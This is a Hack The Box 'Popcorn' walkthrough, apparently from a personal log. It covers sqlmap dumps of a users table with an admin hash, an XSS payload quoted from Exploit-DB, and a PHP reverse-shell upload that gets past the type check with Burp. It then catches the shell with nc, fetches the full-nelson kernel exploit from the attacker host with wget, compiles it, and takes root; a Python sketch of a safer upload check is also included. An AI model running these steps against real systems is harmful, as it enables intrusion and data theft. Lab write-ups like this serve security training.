1. SCANNING
┌──(root💀takudaddy)-[/htb/popcorn]
└─# nmap -sC -sV -p- -oA pop 10.10.10.6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 22:57 KST
Nmap scan report for 10.10.10.6
Host is up (0.21s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2. WEB ENUMERATION
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Retrieved x-powered-by header: PHP/5.2.10-2ubuntu6.10
+ /test: Output from the phpinfo() function was found.
+ OSVDB-112004: /test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ /test.php: Output from the phpinfo() function was found.
+ /test/: Output from the phpinfo() function was found.
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3233: /test/php_info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
---- Entering directory: http://10.10.10.6/torrent/users/ ----
+ http://10.10.10.6/torrent/users/change_password (CODE:200|SIZE:80)
+ http://10.10.10.6/torrent/users/forgot_password (CODE:200|SIZE:7917)
+ http://10.10.10.6/torrent/users/img (CODE:200|SIZE:701)
+ http://10.10.10.6/torrent/users/index (CODE:200|SIZE:80)
+ http://10.10.10.6/torrent/users/index.php (CODE:200|SIZE:80)
+ http://10.10.10.6/torrent/users/registration (CODE:200|SIZE:8179)
==> DIRECTORY: http://10.10.10.6/torrent/users/templates/
shellshock
apache 2.2.12
sqlmap
┌──(root💀takudaddy)-[/htb/popcorn]
└─# sqlmap --url http://10.10.10.6/torrent/login.php --data="username=asd&password=asd" --dbs --batch
[01:11:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 9.10 (Karmic Koala)
web application technology: PHP, PHP 5.2.10, Apache 2.2.12
back-end DBMS: MySQL >= 5.0
[01:11:46] [INFO] fetching database names
[01:11:46] [INFO] retrieved: 'information_schema'
[01:11:46] [INFO] retrieved: 'torrenthoster'
available databases [2]:
[*] information_schema
[*] torrenthoster
[01:11:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.6'
[*] ending @ 01:11:46 /2021-04-18/
┌──(root💀takudaddy)-[/htb/popcorn]
└─# sqlmap -r req.txt -D torrenthoster --tables --batch
Database: torrenthoster
[8 tables]
+---------------+
| log |
| ban |
| categories |
| comments |
| namemap |
| news |
| subcategories |
| users |
+---------------+
┌──(root💀takudaddy)-[/htb/popcorn]
└─# sqlmap -r req.txt -D torrenthoster --tables -dump --batch
Database: torrenthoster
Table: subcategories
[35 entries]
+----+-------+-----------------+
| id | catid | name |
+----+-------+-----------------+
| 34 | 5 | Rap |
| 35 | 5 | Rock |
| 32 | 5 | Punk |
| 33 | 5 | R&B |
| 31 | 5 | Pop |
| 30 | 5 | Hip Hop |
| 27 | 4 | Wallpapers |
| 26 | 4 | Other |
| 25 | 3 | Religion |
| 24 | 3 | Other |
| 23 | 3 | Manuals |
| 22 | 3 | Funny clips |
| 21 | 3 | Flash/Shockwave |
| 20 | 3 | Comics |
| 19 | 3 | Articles |
| 18 | 2 | Soundtracks |
| 17 | 2 | Rock |
| 16 | 2 | Rap |
| 15 | 2 | R&B |
| 14 | 2 | Punk |
| 13 | 2 | Pop |
| 12 | 2 | Hip Hop |
| 11 | 2 | Classic |
| 10 | 2 | Alternative |
| 9 | 1 | Thriller |
| 8 | 1 | Romance |
| 7 | 1 | Martial Arts |
| 6 | 1 | Horror |
| 5 | 1 | Family |
| 4 | 1 | Drama |
| 1 | 1 | Action |
| 2 | 1 | Adventure |
| 3 | 1 | Comedy |
| 29 | 5 | Classic |
| 28 | 5 | Alternative |
+----+-------+-----------------+
+----+----------------------+---------------------+----------------------------------+----------+-----------+---------------------+
| id | email | joined | password | userName | privilege | lastconnect |
+----+----------------------+---------------------+----------------------------------+----------+-----------+---------------------+
| 3 | admin@yourdomain.com | 2007-01-06 21:12:46 | d5bfedcee289e5e05b86daad8ee3e2e2 | Admin | admin | 2007-01-06 21:12:46 |
+----+----------------------+---------------------+----------------------------------+----------+-----------+---------------------+
┌──(root💀takudaddy)-[/htb/popcorn]
└─# sqlmap --url http://10.10.10.6/torrent/login.php --data="username=asd&password=asd" --dump-all --batch
┌──(root💀takudaddy)-[/htb/popcorn]
└─# hash-identifier d5bfedcee289e5e05b86daad8ee3e2e2
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
d5bfedcee289e5e05b86daad8ee3e2e2
Could not crack it.
┌──(root💀takudaddy)-[/htb/popcorn]
└─# searchsploit torrent hoster
-------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------- ---------------------------------
Torrent Hoster - Remount Upload | php/webapps/11746.txt
-------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀takudaddy)-[/htb/popcorn]
└─# searchsploit -m php/webapps/11746.txt
Exploit: Torrent Hoster - Remount Upload
URL: https://www.exploit-db.com/exploits/11746
Path: /usr/share/exploitdb/exploits/php/webapps/11746.txt
File Type: HTML document, ASCII text, with CRLF line terminators
Copied to: /htb/popcorn/11746.txt
┌──(root💀takudaddy)-[/htb/popcorn]
└─# cat 11746.txt
========================================================================================
| # Title : Torrent Hoster Remont Upload Exploit
| # Author : El-Kahina
| # Home : www.h4kz.com |
| # Script : Powered by Torrent Hoster.
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Upload
|
====================== Exploit By El-Kahina =================================
# Exploit :
1 - use tamper data :
http://127.0.0.1/torrenthoster//torrents.php?mode=upload
2-
<center>
Powered by Torrent Hoster
<br />
<form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
<strong>���� ��� ����� �� ��:</strong> <?php echo $maxfilesize; ?>��������<br />
<br>
<input type="file" name="upfile" size="50" /><br />
<input type="submit" value="��� �����" id="upload" />
</form>
<div id="part2" style="display: none;">��� ��� ����� .. �� ���� �����</div>
</center>
3 - http://127.0.0.1/torrenthoster/torrents/ (to find shell)
4 - Xss:
http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt>
==========================================
Greetz : Exploit-db Team
all my friend :(Dz-Ghost Team )
im indoushka's sister
Not useful.
3. EXPLOITATION
Registration is open.
Torrent files can be uploaded.
Images can be uploaded.
Create a reverse shell,
give it an extension such as jpg,
then modify the request in transit with Burp.
Check the upload directory:
the resulting php file is there.
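The bypass above works because the server decides on what the browser (or an intercepting proxy) claims about the file. As an added example, not code from the Torrent Hoster project, here is a Python sketch of that weak check beside a hardened one that whitelists the extension, requires the leading bytes to agree with it, and stores the file under a server-chosen name; the sample bodies and the signature table are constructed.

```python
import secrets

# Extension whitelist, mapped to the canonical type it must contain.
ALLOWED_EXT = {"jpg": "jpg", "jpeg": "jpg", "png": "png", "gif": "gif",
               "torrent": "torrent"}

# Well-known leading bytes per type (constructed table, not exhaustive).
MAGIC = [
    (b"\xff\xd8\xff", "jpg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"d8:announce", "torrent"),  # bencoded dict whose first key is "announce"
]


def weak_check(filename, content_type):
    """The flawed pattern: accept on the client-supplied Content-Type alone
    and keep the client's filename, so a .php body whose header was
    rewritten to image/jpeg is stored as executable PHP."""
    return content_type.startswith("image/")


def sniff_type(body):
    """Identify the upload by its leading bytes, ignoring name and headers."""
    for magic, kind in MAGIC:
        if body.startswith(magic):
            return kind
    return None


def hardened_check(filename, body):
    """Hardened pattern. Returns (accepted, stored_name_or_reason).
    Content-Type is deliberately not an input: it is attacker-controlled."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    kind = sniff_type(body)
    if kind != ALLOWED_EXT[ext]:
        return False, "content does not match extension"
    # Never reuse the client name: no path separators, no double extensions,
    # and the extension is the canonical one for the detected type.
    stored = f"{secrets.token_hex(8)}.{kind}"
    return True, stored
```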
┌──(root💀takudaddy)-[/htb/popcorn]
└─# nc -lvnp 7979
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.6] 38386
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
08:34:36 up 15:39, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
Foothold obtained.
4. PRIVILEGE ESCALATION
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@popcorn:/$
www-data@popcorn:/$ ls
ls
bin dev initrd.img media proc selinux tmp vmlinuz
boot etc lib mnt root srv usr
cdrom home lost+found opt sbin sys var
www-data@popcorn:/$ ls -al
ls -al
total 89
drwxr-xr-x 21 root root 4096 Apr 17 16:55 .
drwxr-xr-x 21 root root 4096 Apr 17 16:55 ..
drwxr-xr-x 2 root root 4096 Mar 17 2017 bin
drwxr-xr-x 4 root root 1024 Oct 26 19:31 boot
lrwxrwxrwx 1 root root 11 Mar 17 2017 cdrom -> media/cdrom
drwxr-xr-x 14 root root 3320 Apr 17 16:55 dev
drwxr-xr-x 87 root root 4096 Apr 17 16:55 etc
drwxr-xr-x 3 root root 4096 Mar 17 2017 home
lrwxrwxrwx 1 root root 37 Mar 17 2017 initrd.img -> boot/initrd.img-2.6.31-14-generic-pae
drwxr-xr-x 15 root root 12288 Oct 1 2020 lib
drwx------ 2 root root 16384 Mar 17 2017 lost+found
drwxr-xr-x 4 root root 4096 Mar 17 2017 media
drwxr-xr-x 2 root root 4096 Oct 20 2009 mnt
drwxr-xr-x 2 root root 4096 Mar 17 2017 opt
dr-xr-xr-x 128 root root 0 Apr 17 16:54 proc
drwx------ 5 root root 4096 Oct 27 11:09 root
drwxr-xr-x 2 root root 4096 Oct 26 19:31 sbin
drwxr-xr-x 2 root root 4096 Oct 20 2009 selinux
drwxr-xr-x 3 root root 4096 Oct 1 2020 srv
drwxr-xr-x 12 root root 0 Apr 17 16:54 sys
drwxrwxrwt 5 root root 4096 Apr 18 08:33 tmp
drwxr-xr-x 11 root root 4096 Oct 1 2020 usr
drwxr-xr-x 15 root root 4096 Mar 17 2017 var
lrwxrwxrwx 1 root root 34 Mar 17 2017 vmlinuz -> boot/vmlinuz-2.6.31-14-generic-pae
www-data@popcorn:/$ c d/home
c d/home
c: command not found
www-data@popcorn:/$ ls
ls
bin dev initrd.img media proc selinux tmp vmlinuz
boot etc lib mnt root srv usr
cdrom home lost+found opt sbin sys var
www-data@popcorn:/$ cd home
cd home
www-data@popcorn:/home$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Mar 17 2017 .
drwxr-xr-x 21 root root 4096 Apr 17 16:55 ..
drwxr-xr-x 3 george george 4096 Oct 26 19:35 george
www-data@popcorn:/home$ cd george
cd george
www-data@popcorn:/home/george$ ls -al
ls -al
total 868
drwxr-xr-x 3 george george 4096 Oct 26 19:35 .
drwxr-xr-x 3 root root 4096 Mar 17 2017 ..
lrwxrwxrwx 1 george george 9 Oct 26 19:35 .bash_history -> /dev/null
-rw-r--r-- 1 george george 220 Mar 17 2017 .bash_logout
-rw-r--r-- 1 george george 3180 Mar 17 2017 .bashrc
drwxr-xr-x 2 george george 4096 Mar 17 2017 .cache
-rw------- 1 root root 1571 Mar 17 2017 .mysql_history
-rw------- 1 root root 19 May 5 2017 .nano_history
-rw-r--r-- 1 george george 675 Mar 17 2017 .profile
-rw-r--r-- 1 george george 0 Mar 17 2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17 2017 torrenthoster.zip
-rw-r--r-- 1 george george 33 Apr 17 16:55 user.txt
www-data@popcorn:/home/george$ cat user.txt
cat user.txt
a837fcd27561484ab540a4a9e65d853a
www-data@popcorn:/home/george$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/nell
<ge$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/nell
bash: /dev/nell: Permission denied
www-data@popcorn:/home/george$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
<ge$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 30492 May 12 2009 /bin/ping6
-rwsr-xr-x 1 root root 34696 May 12 2009 /bin/ping
-rwsr-xr-x 1 root root 47096 Oct 23 2009 /bin/umount
-rwsr-xr-x 1 root root 72188 Oct 23 2009 /bin/mount
-rwsr-xr-x 1 root root 22064 Mar 5 2009 /bin/fusermount
-rwsr-xr-x 1 root root 31124 Jul 31 2009 /bin/su
-rwsr-xr-x 1 root root 9548 Jan 11 2011 /usr/lib/pt_chown
-r-sr-xr-x 1 root root 9532 Oct 26 19:31 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Oct 26 19:31 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 5544 Apr 29 2009 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 179120 Oct 22 2009 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 40332 Jul 31 2009 /usr/bin/chfn
-rwsr-xr-x 1 root root 30936 Jul 31 2009 /usr/bin/newgrp
-rwsr-xr-x 1 root root 52036 Nov 5 2008 /usr/bin/mtr
-rwsr-xr-x 1 root root 31756 Jul 31 2009 /usr/bin/chsh
-rwsr-xr-x 2 root root 123448 Jun 22 2009 /usr/bin/sudo
-rwsr-xr-x 1 root root 13948 May 12 2009 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 41292 Jul 31 2009 /usr/bin/passwd
-rwsr-xr-x 1 root root 13816 May 12 2009 /usr/bin/arping
-rwsr-xr-x 1 root root 57964 Jul 31 2009 /usr/bin/gpasswd
-rwsr-xr-x 2 root root 123448 Jun 22 2009 /usr/bin/sudoedit
-rwsr-sr-x 1 daemon daemon 46964 Sep 15 2009 /usr/bin/at
-rwsr-xr-- 1 root dip 277352 Feb 20 2009 /usr/sbin/pppd
-rwsr-sr-x 1 libuuid libuuid 13848 Oct 23 2009 /usr/sbin/uuidd
www-data@popcorn:/tmp$ uname -a
uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/tmp$ uname -r
uname -r
2.6.31-14-generic-pae
www-data@popcorn:/tmp$ cat /etc/*issue
cat /etc/*issue
Ubuntu 9.10 \n \l
Fetch the script that suggests possible exploits for this kernel:
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
www-data@popcorn:/tmp$ wget http://10.10.14.13/LES.sh
wget http://10.10.14.13/LES.sh
--2021-04-18 11:59:47-- http://10.10.14.13/LES.sh
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 87559 (86K) [text/x-sh]
Saving to: `LES.sh'
100%[======================================>] 87,559 138K/s in 0.6s
2021-04-18 11:59:48 (138 KB/s) - `LES.sh' saved [87559/87559]
www-data@popcorn:/tmp$ chmod LES.sh
chmod LES.sh
chmod: missing operand after `LES.sh'
Try `chmod --help' for more information.
www-data@popcorn:/tmp$ chmod +x LES.sh
chmod +x LES.sh
www-data@popcorn:/tmp$ ./LES.sh
id
./LES.sh
id
Available information:
Kernel version: 2.6.31
Architecture: i686
Distribution: ubuntu
Distribution version: 9.10
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
76 kernel space exploits
48 user space exploits
Possible Exploits:
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: highly probable
Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
www-data@popcorn:/tmp$ wget http://10.10.14.13/full-nelson.c
wget http://10.10.14.13/full-nelson.c
--2021-04-18 12:10:53-- http://10.10.14.13/full-nelson.c
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9400 (9.2K) [text/x-csrc]
Saving to: `full-nelson.c'
100%[======================================>] 9,400 45.2K/s in 0.2s
2021-04-18 12:10:54 (45.2 KB/s) - `full-nelson.c' saved [9400/9400]
www-data@popcorn:/tmp$ gcc -o attack full-nelson.c
gcc -o attack full-nelson.c
www-data@popcorn:/tmp$ chmod +x attack
chmod +x attack
www-data@popcorn:/tmp$ ./attack
./attack
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf84d3280
[+] Resolved econet_ops to 0xf84d3360
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
id
uid=0(root) gid=0(root)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
151b12b7d1ce05855b7ad1fe26ff9207
#
Done.